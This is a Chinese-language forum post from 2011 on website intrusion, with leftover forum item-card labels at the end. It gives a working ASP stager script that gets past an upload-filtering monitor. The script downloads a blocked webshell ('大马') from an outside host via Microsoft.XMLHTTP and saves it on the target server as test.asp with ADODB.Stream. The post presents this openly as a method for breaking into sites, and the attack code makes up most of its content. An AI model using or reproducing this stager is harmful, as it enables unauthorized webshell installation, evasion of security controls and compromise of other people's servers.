|
|
我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。
既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.58ly.com/test.txt",False //代码在网上的地址 也就是大马
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("test.asp"),2 //在同级目录生成asp的文件
set sGet = nothing
set sPOST = nothing
response.Write("下载文件成功!")//下载成功提示
%>
利用服务器的XML和数据流组件,从网站上的test.txt的内容下载到目标站点并在上传的同级目录并保存为test.asp。
test.txt中的内容当然就是被拦截的木马内容了。之后访问这个提交的ASP网页文件,会出现一片空白,显示下载文件成功。然后我们再访问这个test.asp文件,则想要上传的内容已经被保存成功! |
|
窥视卡
雷达卡
发表于 2011-1-29 04:21:10
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜